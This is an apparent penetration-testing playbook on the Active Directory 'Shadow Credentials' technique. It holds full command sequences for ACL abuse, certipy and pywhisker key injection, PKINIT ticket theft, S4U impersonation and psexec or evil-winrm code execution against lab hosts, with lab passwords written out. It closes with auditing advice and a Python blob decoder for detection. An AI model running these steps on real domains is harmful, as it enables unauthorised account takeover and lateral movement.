🏴‍☠️
PlayBook

Shadow Credentials

Overview

This technique allows an attacker to take over an AD user or computer account if the attacker can modify the target object's msDS-KeyCredentialLink attribute and append a key credential of their own: the public half of an attacker-generated key pair, wrapped in a self-signed certificate. The DC then accepts PKINIT (certificate-based Kerberos pre-authentication) with that key as the target account, returning a TGT from which the account's NT hash can also be recovered.

Unless you have rights in the Certificate Authority, this attack is only available under the key trust model: nothing vouches for the attacker's key except its presence in the target object's attribute, so no CA-issued client certificate is needed.

Key trust

Pros

  • Does not require a CA to set up (no client certificate enrollment)

  • Keys can be TPM-backed

Cons

  • No centralized administration: keys must be reviewed and disabled per object

  • Self-signed certificate (arguably the whole problem with this model)

Pre-requisites

Besides the ability to write the attribute msDS-KeyCredentialLink on the target user or computer, the environment must be set up as follows for this technique to work:

  • At least one Domain Controller running Windows Server 2016 or later, since that is the version that added PKINIT support for key trust.

  • A digital certificate for Server Authentication installed on that Domain Controller (PKINIT requires the KDC itself to present a certificate, even though the client key is self-signed).

  • Windows Server 2016 Domain Functional Level in Active Directory.

  • A compromised account with delegated rights to write the msDS-KeyCredentialLink attribute of the target object (owner, GenericAll, GenericWrite or WriteProperty on the attribute, or a path to those rights such as the WriteDACL and group-membership chain used below).

Steps to perform - Windows

# PowerView, run in PowerShell as m.lovegod (needs WriteDACL or ownership of the "Network Audit" group)
$pass='AbsoluteLDAP2022!';$uname='absolute.htb\m.lovegod';$cred = new-object system.management.automation.pscredential($uname,$(convertto-securestring -asplaintext -force $pass))
# Grant m.lovegod full rights on the group, add the account to it and verify; group membership is what gives the write right over winrm_user
Add-DomainObjectAcl -Credential $cred -TargetIdentity "Network Audit" -Rights All -PrincipalIdentity m.lovegod -DomainController dc.absolute.htb
Add-DomainGroupMember -Credential $cred -Identity "Network Audit" -member m.lovegod -Domain "absolute.htb"
Get-DomainGroupMember -Credential $cred -Identity "Network Audit" -Domain "absolute.htb" -DomainController "dc.absolute.htb" | fl MemberName
# The shadow-credential step runs from the Linux attack host: get a TGT, let certipy append a key credential to winrm_user,
# authenticate with it through PKINIT (saving winrm_user's TGT and NT hash) and restore the original attribute value
kinit m.lovegod
certipy-ad shadow auto -username m.lovegod@absolute.htb -account winrm_user -k -target dc.absolute.htb
# Use the recovered ticket over Kerberos WinRM (the -r realm must be configured in /etc/krb5.conf)
export KRB5CCNAME=winrm_user.ccache
evil-winrm -i dc -r absolute.htb

Steps to perform - Linux

# Install the dacledit branch of impacket (ShutdownRepo fork)
git clone https://github.com/ShutdownRepo/impacket -b dacledit
cd impacket
python3 -m venv .venv
source .venv/bin/activate
pip3 install .
# Write yourself WriteMembers on the group (needs WriteDACL or ownership); dacledit saves the current DACL to dacledit-<timestamp>.bak in the working directory for the restore step
dacledit.py -action 'write' -rights 'WriteMembers' -principal 'm.lovegod' -target-dn 'CN=NETWORK AUDIT,CN=USERS,DC=ABSOLUTE,DC=HTB' 'ABSOLUTE.HTB/m.lovegod:AbsoluteLDAP2022!'
# Add yourself to the group
net rpc group addmem 'Network Audit' m.lovegod -U 'ABSOLUTE.HTB/m.lovegod%AbsoluteLDAP2022!' -S dc
# Verify
net rpc group members 'Network Audit' -U 'ABSOLUTE.HTB/m.lovegod%AbsoluteLDAP2022!' -S dc
# Use certipy for the shadow credential (Kerberos auth, so obtain a TGT first)
kinit m.lovegod  # or obtain the ccache with impacket-getTGT
certipy-ad shadow auto -username m.lovegod@absolute.htb -account winrm_user -k -target dc.absolute.htb
export KRB5CCNAME=winrm_user.ccache
evil-winrm -i dc -r absolute.htb
# Restore the original DACL from the backup dacledit wrote (file name taken from the author's run)
dacledit.py -action restore -file ./impacket/examples/dacledit-20240508-144024.bak -principal 'm.lovegod' -target-dn 'CN=NETWORK AUDIT,CN=USERS,DC=ABSOLUTE,DC=HTB' 'ABSOLUTE.HTB/m.lovegod:AbsoluteLDAP2022!' -k

Performing with other tools

# pywhisker: append a key credential to the computer account ZPH-SVRMGMT1$ and export the key as cert.pfx protected with P@ssw0rd
python3 pywhisker.py -d "zsm.local" -u "marcus" -p '!QAZ2wsx' -t 'ZPH-SVRMGMT1$' --action "add" -P P@ssw0rd -f cert

# PKINITtools: authenticate as the computer account with the certificate and save its TGT
python ../PKINITtools/gettgtpkinit.py 'zsm.local/ZPH-SVRMGMT1$' -cert-pfx cert.pfx -pfx-pass P@ssw0rd zph-svrmgmt1.ccache

export KRB5CCNAME=zph-svrmgmt1.ccache

# S4U2self as the computer account: a CIFS service ticket to itself impersonating administrator, which is local admin on that host
python ../PKINITtools/gets4uticket.py kerberos+ccache://'zsm.local\ZPH-SVRMGMT1$':zph-svrmgmt1.ccache@192.168.210.10 cifs/zph-svrmgmt1.zsm.local@zsm.local administrator@zsm.local admin.ccache -v

export KRB5CCNAME=admin.ccache

# Use the impersonation ticket for code execution (add -no-pass to skip the password prompt)
impacket-psexec -k ZPH-SVRMGMT1.ZSM.LOCAL

AD Auditing

[screenshot not recoverable] Enumerating every object with a populated msDS-KeyCredentialLink attribute can be used to find orphaned or malicious keys existing in AD.

The DSInternals PowerShell module parses the attribute into its individual key credentials and can also find ROCA-vulnerable or otherwise weak keys in AD.

Be careful when cleaning up: clearing msDS-KeyCredentialLink on a user or device object removes every key linked to it, so legitimate key-trust sign-ins (Windows Hello for Business) from ALL devices that user has enrolled stop working. DSInternals allows selective deletion of a single key by its KeyId, so remove only the rogue entry. [two screenshots not recoverable]
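To audit the attribute without DSInternals, or to inspect a target before and after a certipy/pywhisker run, the raw value has to be decoded. The Python below is an added example, not code from the original page or from certipy, pywhisker, Whisker or DSInternals. It parses the DN-with-binary string that ldapsearch or ldapdomaindump return for msDS-KeyCredentialLink (KEYCREDENTIALLINK_BLOB, MS-ADTS 2.2.20): the target DN, key usage and source, device GUID, creation time, and whether the KeyID still matches the key material. The sample value is constructed here (hypothetical account DN, placeholder key bytes instead of a real RSA public key blob, random device GUID) and leaves out the KeyHash entry that real tools also write.

```python
"""Decode msDS-KeyCredentialLink values (KEYCREDENTIALLINK_BLOB, MS-ADTS 2.2.20).

Added example, not from the page or from certipy/pywhisker/Whisker/DSInternals.
The sample at the bottom is constructed; real KeyMaterial is a BCRYPT_RSAKEY_BLOB.
"""
import hashlib
import struct
import uuid
from datetime import datetime, timedelta, timezone

# KEYCREDENTIALLINK_ENTRY identifiers (MS-ADTS 2.2.20.6)
ENTRY_NAMES = {
    0x01: "KeyID", 0x02: "KeyHash", 0x03: "KeyMaterial", 0x04: "KeyUsage",
    0x05: "KeySource", 0x06: "DeviceId", 0x07: "CustomKeyInformation",
    0x08: "KeyApproximateLastLogonTimeStamp", 0x09: "KeyCreationTime",
}
KEY_USAGE = {0x01: "NGC", 0x07: "FIDO", 0x08: "FEK"}
KEY_SOURCE = {0x00: "AD", 0x01: "AzureAD"}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(raw: bytes) -> datetime:
    """FILETIME: little-endian 64-bit count of 100 ns ticks since 1601-01-01 UTC."""
    (ticks,) = struct.unpack("<Q", raw)
    return FILETIME_EPOCH + timedelta(microseconds=ticks // 10)


def split_dn_binary(value: str):
    """Split the LDAP DN-with-binary form 'B:<hex digit count>:<hex>:<dn>' into (blob, dn)."""
    tag, count, hexdata, dn = value.split(":", 3)
    if tag != "B" or int(count) != len(hexdata):
        raise ValueError("not a well-formed DN-with-binary value")
    return bytes.fromhex(hexdata), dn


def parse_key_credential_link(value: str) -> dict:
    """Return the decoded entries plus the target DN and a KeyID integrity flag."""
    blob, dn = split_dn_binary(value)
    (version,) = struct.unpack_from("<I", blob, 0)
    if version != 0x200:
        raise ValueError(f"unsupported KEYCREDENTIALLINK_BLOB version {version:#x}")
    raw, offset = {}, 4
    while offset < len(blob):
        # Each entry: uint16 length, uint8 identifier, then `length` bytes of value
        length, ident = struct.unpack_from("<HB", blob, offset)
        offset += 3
        raw[ENTRY_NAMES.get(ident, f"Unknown{ident:#x}")] = blob[offset:offset + length]
        offset += length
    out = {"dn": dn}
    for name, data in raw.items():
        if name == "KeyUsage":
            out[name] = KEY_USAGE.get(data[0], f"unknown({data[0]:#x})")
        elif name == "KeySource":
            out[name] = KEY_SOURCE.get(data[0], f"unknown({data[0]:#x})")
        elif name == "DeviceId":
            out[name] = str(uuid.UUID(bytes_le=data))  # GUID is stored little-endian
        elif name in ("KeyCreationTime", "KeyApproximateLastLogonTimeStamp"):
            out[name] = filetime_to_datetime(data)
        else:
            out[name] = data.hex()
    # Version-2 blobs carry KeyID = SHA-256(KeyMaterial), the convention Whisker and
    # DSInternals follow; a mismatch means a hand-edited or truncated value.
    if "KeyID" in raw and "KeyMaterial" in raw:
        out["KeyIdMatchesMaterial"] = raw["KeyID"] == hashlib.sha256(raw["KeyMaterial"]).digest()
    return out


def build_key_credential_link(key_material: bytes, device_id: uuid.UUID, created: datetime,
                              dn: str, key_id: bytes = b"") -> str:
    """Assemble a version-2 blob with the entries pywhisker/Whisker write (KeyHash omitted).

    key_id is normally derived from key_material; the override only exists so a
    tampered value can be produced to exercise the integrity check."""
    def entry(ident: int, data: bytes) -> bytes:
        return struct.pack("<HB", len(data), ident) + data
    ticks = int((created - FILETIME_EPOCH).total_seconds()) * 10_000_000
    blob = struct.pack("<I", 0x200)
    blob += entry(0x01, key_id or hashlib.sha256(key_material).digest())
    blob += entry(0x03, key_material)
    blob += entry(0x04, b"\x01")            # KeyUsage: NGC
    blob += entry(0x05, b"\x00")            # KeySource: AD
    blob += entry(0x06, device_id.bytes_le)
    blob += entry(0x07, b"\x01\x00")        # CustomKeyInformation: version 1, no flags
    blob += entry(0x09, struct.pack("<Q", ticks))
    return f"B:{len(blob) * 2}:{blob.hex().upper()}:{dn}"


# Constructed sample: hypothetical account, placeholder key bytes, random device GUID
SAMPLE_DN = "CN=winrm_user,CN=Users,DC=absolute,DC=htb"
SAMPLE_KEY = bytes(range(256)) + b"\x00" * 14
SAMPLE_DEVICE = uuid.UUID("2b5fa2a9-0a1e-4c4c-9f3c-0b6f5d8e1a77")
SAMPLE_CREATED = datetime(2024, 5, 8, 14, 40, 24, tzinfo=timezone.utc)
SAMPLE_VALUE = build_key_credential_link(SAMPLE_KEY, SAMPLE_DEVICE, SAMPLE_CREATED, SAMPLE_DN)

if __name__ == "__main__":
    for k, v in parse_key_credential_link(SAMPLE_VALUE).items():
        print(f"{k:34} {v[:32] + '...' if k == 'KeyMaterial' else v}")
```

Paste a real value from an LDAP dump into parse_key_credential_link to review it: a KeyCreationTime that does not line up with any device enrollment, a DeviceId unknown to your device inventory, or a KeyID that no longer matches the material are the entries to take to DSInternals for selective removal. The builder shows the same layout an attacker tool writes, which is why the attribute is worth watching for writes (directory service object modification events on msDS-KeyCredentialLink) and not only for its contents.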
